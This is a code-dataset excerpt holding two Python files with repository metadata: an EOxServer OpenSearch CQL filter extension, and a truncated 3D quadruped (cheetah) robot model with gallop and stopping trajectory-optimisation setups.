hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
af1cd328ee95b3ce28045b665a6e2190194f9a9c
| 2,849
|
py
|
Python
|
eoxserver/services/opensearch/extensions/cql.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 25
|
2015-08-10T19:34:34.000Z
|
2021-02-05T08:28:01.000Z
|
eoxserver/services/opensearch/extensions/cql.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 153
|
2015-01-20T08:35:49.000Z
|
2022-03-16T11:00:56.000Z
|
eoxserver/services/opensearch/extensions/cql.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 10
|
2015-01-23T15:48:30.000Z
|
2021-01-21T15:41:18.000Z
|
# ------------------------------------------------------------------------------
#
# Project: EOxServer <http://eoxserver.org>
# Authors: Fabian Schindler <fabian.schindler@eox.at>
#
# ------------------------------------------------------------------------------
# Copyright (C) 2017 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ------------------------------------------------------------------------------
from eoxserver.core.decoders import kvp
from eoxserver.core.util.xmltools import NameSpace
from eoxserver.services import filters, ecql
class CQLExtension(object):
""" Implementation of the OpenSearch `'EO' extension
<http://docs.opengeospatial.org/is/13-026r8/13-026r8.html>`_.
"""
namespace = NameSpace(
"http://a9.com/-/opensearch/extensions/cql/1.0/", "cql"
)
def filter(self, qs, parameters):
mapping, mapping_choices = filters.get_field_mapping_for_model(qs.model)
decoder = CQLExtensionDecoder(parameters)
cql_text = decoder.cql
if cql_text:
ast = ecql.parse(cql_text)
filter_expressions = ecql.to_filter(ast, mapping, mapping_choices)
qs = qs.filter(filter_expressions)
return qs
def get_schema(self, collection=None, model_class=None):
return (
dict(name="cql", type="cql", profiles=[
dict(
href="http://www.opengis.net/csw/3.0/cql",
title=(
"CQL (Common Query Language) is a query language "
"created by the OGC for the Catalogue Web Services "
"specification."
)
)
]),
)
class CQLExtensionDecoder(kvp.Decoder):
cql = kvp.Parameter(num="?", type=str)
| 39.569444
| 80
| 0.614953
| 336
| 2,849
| 5.169643
| 0.520833
| 0.044329
| 0.01612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009507
| 0.22464
| 2,849
| 71
| 81
| 40.126761
| 0.776822
| 0.532117
| 0
| 0
| 0
| 0
| 0.156347
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.096774
| 0.032258
| 0.354839
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af1d6a6d06805cdde1b38ccbd57154e51315542b
| 31,786
|
py
|
Python
|
examples/quadruped3D.py
|
alknemeyer/physical_education
|
7bcad4111bc153a0c9c080f11a43295bd1d8c425
|
[
"MIT"
] | 5
|
2020-09-27T14:00:12.000Z
|
2022-01-31T09:06:37.000Z
|
examples/quadruped3D.py
|
alknemeyer/physical_education
|
7bcad4111bc153a0c9c080f11a43295bd1d8c425
|
[
"MIT"
] | 8
|
2020-09-27T15:02:28.000Z
|
2022-03-28T13:51:38.000Z
|
examples/quadruped3D.py
|
alknemeyer/physical_education
|
7bcad4111bc153a0c9c080f11a43295bd1d8c425
|
[
"MIT"
] | 2
|
2020-09-27T14:01:39.000Z
|
2022-01-21T09:47:54.000Z
|
from typing import Any, Dict, Iterable, List, Optional, Tuple, Callable
from math import pi as π
from sympy import Matrix as Mat
from numpy import ndarray
from physical_education.links import Link3D, constrain_rel_angle
from physical_education.system import System3D
from physical_education.foot import add_foot, feet, Foot3D
from physical_education.motor import add_torque
from physical_education.drag import add_drag
from physical_education.spring import add_torquespring
from physical_education.damper import add_torquedamper
parameters = {
# # The model below is terribly out of date. If needed, manually
# # uncomment + test it!
# 'model-6': {
# 'source': """
# A model of cheetah 6 from Functional anatomy of the cheetah (Acinonyx jubatus) forelimb and hindlimb
# doi: 10.1111/j.1469-7580.2011.01344.x and 10.1111/j.1469-7580.2010.01310.x
# """,
# 'body_B': {'mass': 17., 'radius': 0.08, 'length': 0.41},
# 'body_F': {'mass': 8., 'radius': 0.08, 'length': 0.21},
# 'tail0': {'mass': 0.4, 'radius': 0.005, 'length': 0.38},
# 'tail1': {'mass': 0.2, 'radius': 0.005, 'length': 0.38},
# 'front': {
# 'thigh': {'mass': 0.171, 'radius': 0.012, 'length': 0.254},
# 'calf': {'mass': 0.068, 'radius': 0.005, 'length': 0.247},
# },
# 'back': {
# 'thigh': {'mass': 0.210, 'radius': 0.010, 'length': 0.281},
# 'calf': {'mass': 0.160, 'radius': 0.011, 'length': 0.287},
# },
# 'friction_coeff': 1.3,
# 'motor_params': {'torque_bounds': (-2., 2.), 'no_load_speed': 50.},
# },
'mean-male': {
'source': """
Parameters for the 'mean' (X) cheetah from
Morphology, Physical Condition, and Growth of the Cheetah (Acinonyx jubatus jubatus)
https://academic.oup.com/jmammal/article/84/3/840/905900
body mass = 45.6 kg ---> majority (42kg?) in body
chest girth = 71.7 cm ---> front radius = 0.717m / (2*pi)
abdomen girth = 59.4 cm ---> back radius = 0.594m / (2*pi)
skull length = 23.4 cm
body length = 125.5 cm ---> body - skull - neck = 125.5 - 23.4 - (20?) = 80cm => front = 0.5m, back = 0.3m
tail length = 76.7 cm ---> 38cm per half
total length = 202.2 cm
total foreleg length = 77 cm
total hind leg length = 81.1 cm
front foot length = 8.2 cm
front foot width = 6.1 cm
hind foot length = 9.2 cm
hind foot width = 6.2 cm
From "Quasi-steady state aerodynamics of the cheetah tail"
fur length on tail = 10mm on average
average tail diameter (no fur) = 31mm
---> radius = 31/2 + 10 = 25.5mm = 0.0255m
Friction coeff of 1.3 from
"Locomotion dynamics of hunting in wild cheetahs"
NOTE: leg measurements mostly cribbed from 'model-6' above. Find proper values!
lengths = same
masses = same * 1.2
radii = same
NOTE: the motor_params values are mostly made up. In any case, different muscle
groups would need different values
""",
'body_B': {'mass': 28., 'radius': 0.594/(2*π), 'length': 0.3},
'body_F': {'mass': 14., 'radius': 0.717/(2*π), 'length': 0.5},
'tail0': {'mass': 0.4, 'radius': 0.0255, 'length': 0.38},
'tail1': {'mass': 0.2, 'radius': 0.0255, 'length': 0.38},
'front': {
'thigh': {'mass': 0.171*1.2, 'radius': 0.012, 'length': 0.254},
'calf': {'mass': 0.068*1.2, 'radius': 0.005, 'length': 0.247},
},
'back': {
'thigh': {'mass': 0.210*1.2, 'radius': 0.010, 'length': 0.281},
# based on ratios
'calf': {'mass': 0.100*1.2, 'radius': 0.011, 'length': 0.287 * 1.1*(33/(33+24.5))},
# from Liams model
'hock': {'mass': 0.060*1.2, 'radius': 0.011, 'length': 0.287 * 1.1*(24.5/(33+24.5))},
},
'friction_coeff': 1.3,
# measured in terms of body weight, based on the observed limits
# of energy efficient gallops and C-turns at 8, 14 and 20 m/s
# for this model
'motor': {
'spine': {'torque_bounds': (-0.7, 0.7), 'no_load_speed': 50.},
'spine-tail0': {'torque_bounds': (-0.25, 0.25), 'no_load_speed': 50.},
'tail0-tail1': {'torque_bounds': (-0.2, 0.2), 'no_load_speed': 50.},
'front': {
'hip-pitch': {'torque_bounds': (-0.5, 0.6), 'no_load_speed': 50.},
'hip-abduct': {'torque_bounds': (-0.5, 0.6), 'no_load_speed': 50.},
'knee': {'torque_bounds': (-0.5, 0.4), 'no_load_speed': 50.},
},
'back': {
'hip-pitch': {'torque_bounds': (-0.6, 0.6), 'no_load_speed': 50.},
'hip-abduct': {'torque_bounds': (-0.4, 0.5), 'no_load_speed': 50.},
'knee': {'torque_bounds': (-0.1, 0.5), 'no_load_speed': 50.},
'ankle': {'torque_bounds': (-0.4, 0.05), 'no_load_speed': 50.},
},
},
},
}
def model(params: Dict[str, Any], with_tail: bool) -> Tuple[System3D, Callable[[System3D], None]]:
"""
Defines a quadruped model based off a cheetah (see `cheetah-model.png`).
Roughly 400 000 operations in the equations of motion without simplification,
and 140 000 if simplified with
>>> robot.calc_eom(simp_func = lambda x: utils.parsimp(x, nprocs = 14))
Note that the numbers are probably out of date at this point.
"""
# create front and back links of body and tail
body_B = Link3D('base_B', '+x', base=True, **params['body_B'],
meta=['spine', 'back'])
body_F = Link3D('base_F', '+x', start_I=body_B.bottom_I, **params['body_F'],
meta=['spine', 'front'])
# input torques for roll, pitch and yaw of the spine
# body_B.add_hookes_joint(body_F, about='xyz')
add_torque(body_B, body_F, about='xyz', **params['motor']['spine'])
# spring/damper forces on spine
phi_b, th_b, psi_b = body_B.q[3:]
phi_f, th_f, psi_f = body_F.q[:3]
for angles, dof in [(phi_b - phi_f, 'roll'),
(th_b - th_f, 'pitch'),
(psi_b - psi_f, 'yaw')]:
# TODO: actually find these by initialising to 0.5 and bounding to (0.1, 10.)
# the current fixed values are sort of arbitrary (based on a paper)
# about humans
add_torquespring(body_B, body_F, angles, spring_coeff=0.5,
# spring_coeff_lims=(0.1, 10.),
rest_angle=0,
name=f'spine-torquespring-{dof}')
add_torquedamper(body_B, body_F, angles, damping_coeff=0.5,
# damping_coeff_lims=(0.1, 10.),
name=f'spine-torquedamper-{dof}')
# drag on body
add_drag(body_F, at=body_F.bottom_I, name='body_F-drag-head',
use_dummy_vars=True, cylinder_top=True)
add_drag(body_F, at=body_F.Pb_I, name='body_F-drag-body',
use_dummy_vars=True)
add_drag(body_B, at=body_B.Pb_I, use_dummy_vars=True)
if with_tail:
tail0 = Link3D('tail0', '-x', start_I=body_B.top_I,
**params['tail0'], meta=['tail'])
tail1 = Link3D('tail1', '-x', start_I=tail0.bottom_I,
**params['tail1'], meta=['tail'])
# friction coefficient of 0.1 is arbitrary. Worth setting to 0
# in case it speeds things up?
add_foot(tail1, at='bottom', nsides=8, friction_coeff=0.1,
GRFxy_max=0.1, GRFz_max=0.1)
# input torques to tail - pitch and yaw
body_B.add_hookes_joint(tail0, about='xy')
add_torque(body_B, tail0, about='xy', **params['motor']['spine-tail0'])
# torques in the middle of the tail - pitch and yaw
tail0.add_hookes_joint(tail1, about='xy')
add_torque(tail0, tail1, about='xy', **params['motor']['tail0-tail1'])
# drag on tail
add_drag(tail0, at=tail0.Pb_I, use_dummy_vars=True)
add_drag(tail1, at=tail1.Pb_I, use_dummy_vars=True)
def def_leg(body: Link3D, front: bool, right: bool) -> Iterable[Link3D]:
"""Define a leg and attach it to the front/back right/left of `body`.
Only really makes sense when `body` is aligned along the `x`-axis"""
# maybe flip x (or y)
# the model is considered to face along the x axis (so front/back
# refers to changes in the y value).
def mfx(x): return x if front else -x
def mfy(y): return y if right else -y
start_I = body.Pb_I + \
body.Rb_I @ Mat([mfx(body.length/2), mfy(body.radius), 0])
suffix = ('F' if front else 'B') + ('R' if right else 'L')
frontorback_str = 'front' if front else 'back'
rightorleft_str = 'right' if right else 'left'
p = params[frontorback_str]
thigh = Link3D('U'+suffix, '-z', start_I=start_I, **p['thigh'],
meta=['leg', 'thigh', frontorback_str, rightorleft_str])
calf = Link3D('L'+suffix, '-z', start_I=thigh.bottom_I, **p['calf'],
meta=['leg', 'calf', frontorback_str, rightorleft_str])
# next, all of the muscles and their respective limits
muscleparams = params['motor'][frontorback_str]
# input torques: hip pitch and abduct
body.add_hookes_joint(thigh, about='xy')
add_torque(body, thigh, name=f'{frontorback_str}-{rightorleft_str}-hip-pitch',
about='x', **muscleparams['hip-pitch'])
add_torque(body, thigh, name=f'{frontorback_str}-{rightorleft_str}-hip-abduct',
about='y', **muscleparams['hip-abduct'])
thigh.add_revolute_joint(calf, about='y')
add_torque(thigh, calf, about='y', **muscleparams['knee'])
if front:
add_foot(calf, at='bottom', nsides=8,
friction_coeff=params['friction_coeff'],
GRFxy_max=5, GRFz_max=5)
return thigh, calf
else:
hock = Link3D('H'+suffix, '-z', start_I=calf.bottom_I, **p['hock'],
meta=['leg', 'calf', frontorback_str, rightorleft_str])
calf.add_revolute_joint(hock, about='y')
add_torque(calf, hock, about='y', **muscleparams['ankle'])
add_foot(hock, at='bottom', nsides=8,
friction_coeff=params['friction_coeff'],
GRFxy_max=5, GRFz_max=5)
return thigh, calf, hock
ufl, lfl = def_leg(body_F, front=True, right=False)
ufr, lfr = def_leg(body_F, front=True, right=True)
ubl, lbl, hbl = def_leg(body_B, front=False, right=False)
ubr, lbr, hbr = def_leg(body_B, front=False, right=True)
# combine into a robot
tail = [tail0, tail1] if with_tail else [] # type: ignore
robot = System3D('3D quadruped', [body_B, body_F, *tail,
ufl, lfl, ufr, lfr,
ubl, lbl, ubr, lbr,
hbl, hbr])
return robot, add_pyomo_constraints
def has_tail(robot: System3D) -> bool:
return any('tail' in link.name for link in robot.links)
def add_pyomo_constraints(robot: System3D) -> None:
# π/3 = 60 degrees
# π/2 = 90 degrees
# π/4 = 45 degrees
assert robot.m is not None,\
'robot does not have a pyomo model defined on it'
if has_tail(robot):
body_B, body_F, tail0, tail1, \
ufl, lfl, ufr, lfr, \
ubl, lbl, ubr, lbr, \
hbl, hbr = [link['q'] for link in robot.links]
else:
body_B, body_F, \
ufl, lfl, ufr, lfr, \
ubl, lbl, ubr, lbr, \
hbl, hbr = [link['q'] for link in robot.links]
tail0 = tail1 = None
# spine can't bend too much:
constrain_rel_angle(robot.m, 'spine_pitch',
-π/4, body_B[:, :, 'theta'], body_F[:, :, 'theta'], π/4)
constrain_rel_angle(robot.m, 'spine_roll',
-π/4, body_B[:, :, 'phi'], body_F[:, :, 'phi'], π/4)
constrain_rel_angle(robot.m, 'spine_yaw',
-π/4, body_B[:, :, 'psi'], body_F[:, :, 'psi'], π/4)
# tail can't go too crazy:
if tail0 is not None:
constrain_rel_angle(robot.m, 'tail_body_pitch',
-π/3, body_B[:, :, 'theta'], tail0[:, :, 'theta'], π/3)
constrain_rel_angle(robot.m, 'tail_body_yaw',
-π/3, body_B[:, :, 'phi'], tail0[:, :, 'phi'], π/3)
constrain_rel_angle(robot.m, 'tail_tail_pitch',
-π/2, tail0[:, :, 'theta'], tail1[:, :, 'theta'], π/2)
constrain_rel_angle(robot.m, 'tail_tail_yaw',
-π/2, tail0[:, :, 'phi'], tail1[:, :, 'phi'], π/2)
# legs: hip abduction and knee
for body, thigh, calf, hock, name in ((body_F, ufl, lfl, None, 'FL'),
(body_F, ufr, lfr, None, 'FR'),
(body_B, ubl, lbl, hbl, 'BL'),
(body_B, ubr, lbr, hbr, 'BR')):
constrain_rel_angle(robot.m, name + '_hip_pitch',
-π/2, body[:, :, 'theta'], thigh[:, :, 'theta'], π/2)
constrain_rel_angle(robot.m, name + '_hip_aduct',
-π/8, body[:, :, 'phi'], thigh[:, :, 'phi'], π/8)
lo, up = (-π, 0) if name.startswith('B') else (0, π)
constrain_rel_angle(robot.m, name + '_knee',
lo, thigh[:, :, 'theta'], calf[:, :, 'theta'], up)
if hock is not None:
lo, up = (0, π)
constrain_rel_angle(robot.m, name + '_foot',
lo, calf[:, :, 'theta'], hock[:, :, 'theta'], up)
for th in hock[:, :, 'theta']:
th.setub(+π/3)
th.setlb(-π/3)
# common functions
def high_speed_stop(robot: System3D, initial_vel: float, minimize_distance: bool,
gallop_data: Optional[dict] = None, offset: int = 0):
import math
import random
from physical_education.utils import copy_state_init
from physical_education.init_tools import add_costs
if not has_tail(robot):
from physical_education.visual import warn
warn('Need to update high_speed_stop for no tail model!')
nfe = len(robot.m.fe)
ncp = len(robot.m.cp)
total_time = float((nfe-1)*robot.m.hm0.value)
body = robot['base_B']
# start at the origin
body['q'][1, ncp, 'x'].fix(0)
body['q'][1, ncp, 'y'].fix(0)
if gallop_data is not None:
for fed, cpd in robot.indices(one_based=True):
robot.init_from_dict_one_point(
gallop_data, fed=fed, cpd=cpd, fes=(fed-1 + offset) % nfe, cps=0,
skip_if_fixed=True, skip_if_not_None=False, fix=False)
for link in robot.links:
for q in link.pyomo_sets['q_set']:
link['q'][1, ncp, q].fixed = True
link['dq'][1, ncp, q].fixed = True
else:
# init to y plane
body['q'][:, :, 'y'].value = 0
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][:, :, ang].value = 0
link['dq'][:, :, ang].value = 0
link['ddq'][:, :, ang].value = 0
# roughly bound to y plane
for fe, cp in robot.indices(one_based=True):
body['q'][fe, cp, 'y'].setub(0.2)
body['q'][fe, cp, 'y'].setlb(-0.2)
for link in robot.links:
for ang in ('phi', 'psi'):
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, ang].setub(math.pi/4)
link['q'][fe, cp, ang].setlb(-math.pi/4)
# bound theta
for fe, cp in robot.indices(one_based=True):
for link in robot.links[4:]: # all leg segments - no tail or body
link['q'][fe, cp, 'theta'].setub(math.radians(60))
link['q'][fe, cp, 'theta'].setlb(math.radians(-60))
for link in robot.links[:2]: # two body segments
link['q'][fe, cp, 'theta'].setub(math.radians(45))
link['q'][fe, cp, 'theta'].setlb(math.radians(-45))
for link in robot.links:
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = (
math.radians(random.gauss(0, 15)))
body['q'][1, ncp, 'z'].fix(0.6)
# both sides mirrored
for src, dst in (('UFL', 'UFR'), ('LFL', 'LFR'), ('UBL', 'UBR'), ('LBL', 'LBR')):
copy_state_init(robot[src]['q'], robot[dst]['q'])
# init tail to flick?
for link in robot.links[2:4]:
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = (
math.radians(random.random()*60))
# stop weird local minimum where it bounces
for fe, cp in robot.indices(one_based=True):
if fe in range(10):
continue
# if fe > nfe/2: continue
height = body['q'][fe, cp, 'z']
height.setub(0.6) # approx. leg height
for foot in feet(robot):
foot['foot_height'][fe, cp].setub(0.01)
# start at speed
body['dq'][1, ncp, 'x'].fix(initial_vel)
# end at rest
for link in robot.links:
for q in link.pyomo_sets['q_set']:
link['dq'][nfe, ncp, q].fix(0)
# end in a fairly standard position
for link in robot.links[:2]: # two body segments
link['q'][nfe, ncp, 'theta'].setub(math.radians(10))
link['q'][nfe, ncp, 'theta'].setlb(math.radians(-10))
for link in robot.links[4:]: # leaving out tail - it might flail, which is good
link['q'][nfe, ncp, 'theta'].setub(math.radians(20))
link['q'][nfe, ncp, 'theta'].setlb(math.radians(-20))
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][nfe, ncp, ang].setub(math.radians(5))
link['q'][nfe, ncp, ang].setlb(math.radians(-5))
# position and velocity over time
for fe in robot.m.fe:
pos = total_time * (initial_vel/2) * (fe-1)/(nfe-1)
vel = initial_vel * (1 - (fe-1)/(nfe-1))
# print('pos', pos, 'vel', vel)
body['q'][fe, :, 'x'].value = pos
body['dq'][fe, :, 'x'].value = vel
# objective
distance_cost = body['q'][nfe, ncp, 'x'] if minimize_distance else 0
return add_costs(robot, include_transport_cost=False, include_torque_cost=False,
distance_cost=0.0001*distance_cost)
def periodic_gallop_test(robot: System3D,
avg_vel: float,
feet: Iterable['Foot3D'],
foot_order_vals: Iterable[Tuple[int, int]],
init_from_dict: Optional[dict] = None,
at_angle_d: Optional[float] = None
):
"""
foot_order_vals = ((1, 7), (6, 13), (31, 38), (25, 32)) # 14 m/s
"""
from math import sin, cos, radians
import random
from physical_education import utils
from physical_education.foot import prescribe_contact_order
from physical_education.init_tools import sin_around_touchdown, add_costs
from physical_education.constrain import straight_leg, periodic
nfe = len(robot.m.fe)
ncp = len(robot.m.cp)
m = utils.get_pyomo_model_or_error(robot)
total_time = utils.total_time(m)
utils.constrain_total_time(m, total_time=total_time)
body = robot['base_B']
# start at the origin
body['q'][1, ncp, 'x'].fix(0)
body['q'][1, ncp, 'y'].fix(0)
if init_from_dict is None:
if at_angle_d is None or at_angle_d == 0:
# init to y plane
body['q'][:, :, 'y'].value = 0
# running in a straight line
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][:, :, ang].value = (
radians(at_angle_d or 0) if ang == 'psi' else 0
)
link['dq'][:, :, ang].value = 0
link['ddq'][:, :, ang].value = 0
for fe, cp in robot.indices(one_based=True):
var = robot.links[0]['q'][fe, cp, 'psi']
var.setub(radians((at_angle_d or 0) + 10))
var.setlb(radians((at_angle_d or 0) - 10))
# init theta
def rand(mu, sigma, offset=0):
return radians(random.gauss(mu, sigma)+offset)
for fe, cp in robot.indices(one_based=True):
# body
robot.links[0]['q'][fe, cp, 'theta'].value = rand(0, 15)
robot.links[1]['q'][fe, cp, 'theta'].value = rand(0, 15, +10)
# tail
if has_tail(robot):
robot.links[2]['q'][fe, cp, 'theta'].value = rand(0, 15, -10)
robot.links[3]['q'][fe, cp, 'theta'].value = rand(0, 15, -10)
offset = 2 if has_tail(robot) else 0
for link in robot.links[(2+offset):]: # legs
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = rand(0, 30)
# body height
body['q'][:, :, 'z'].value = 0.55
# the feet:
prescribe_contact_order(feet, foot_order_vals)
for (touchdown, liftoff), foot in zip(foot_order_vals, [foot.name.rstrip('_foot') for foot in feet]):
lower, upper = foot, 'U' + foot[1:]
straight_leg(robot[upper]['q'], robot[lower]['q'],
[touchdown], state='theta')
angles = sin_around_touchdown(int((touchdown + liftoff)/2),
len(robot.m.fe))
for fe, val in zip(robot.m.fe, angles): # type: ignore
robot[upper]['q'][fe, :, 'theta'].value = val
robot[lower]['q'][fe, :, 'theta'].value = val + \
radians(-15 if upper[1] == 'F' else 15)
# get timestep bounds ready
# [long/short] timesteps in the air
robot.m.hm[:].value = robot.m.hm[1].lb
for start, stop in foot_order_vals:
for fe in range(start, stop+1):
# but [short/long] timesteps while on the ground
robot.m.hm[fe].value = robot.m.hm[fe].ub
else:
if init_from_dict['ncp'] == 1:
for fed, cpd in robot.indices(one_based=True):
robot.init_from_dict_one_point(init_from_dict, fed=fed, cpd=cpd, fes=fed-1, cps=0,
skip_if_fixed=True, skip_if_not_None=False, fix=False)
else:
robot.init_from_dict(init_from_dict)
if not (at_angle_d == 0 or at_angle_d is None):
raise ValueError(
f'TODO: rotate init! Got at_angle_d = {at_angle_d}')
for link in robot.links:
for fe, cp in robot.indices(one_based=True):
phi = link['q'][fe, cp, 'phi']
phi.setub(radians(+15))
phi.setlb(radians(-15))
psi = link['q'][fe, cp, 'psi']
psi.setub(radians(+10 + (at_angle_d or 0)))
psi.setlb(radians(-10 + (at_angle_d or 0)))
# bound theta
# stop the back from going so high!
for link in robot.links[:2]: # body
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].setub(radians(+45))
link['q'][fe, cp, 'theta'].setlb(radians(-45))
for link in robot.links[2:]: # everything else
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].setub(radians(+90))
link['q'][fe, cp, 'theta'].setlb(radians(-90))
# never fallen over
for fe, cp in robot.indices(one_based=True):
body['q'][fe, cp, 'z'].setlb(0.3)
body['q'][fe, cp, 'z'].setub(0.7)
if at_angle_d is None:
# roughly bound to y plane
for fe, cp in robot.indices(one_based=True, skipfirst=False):
body['q'][fe, cp, 'y'].setub(0.2)
body['q'][fe, cp, 'y'].setlb(-0.2)
# average velocity init (overwrite the init!)
for fe, cp in robot.indices(one_based=True, skipfirst=False):
body['q'][fe, cp, 'x'].value = avg_vel * \
total_time * (fe-1 + (cp-1)/ncp)/(nfe-1)
body['dq'][fe, cp, 'x'].value = avg_vel
body['q'][nfe, ncp, 'x'].fix(total_time*avg_vel)
# periodic
periodic(robot, but_not=('x',))
else:
θᵣ = radians(at_angle_d)
# average velocity init (overwrite the init!)
for fe, cp in robot.indices(one_based=True, skipfirst=False):
scale = total_time * (fe-1 + (cp-1)/ncp)/(nfe-1)
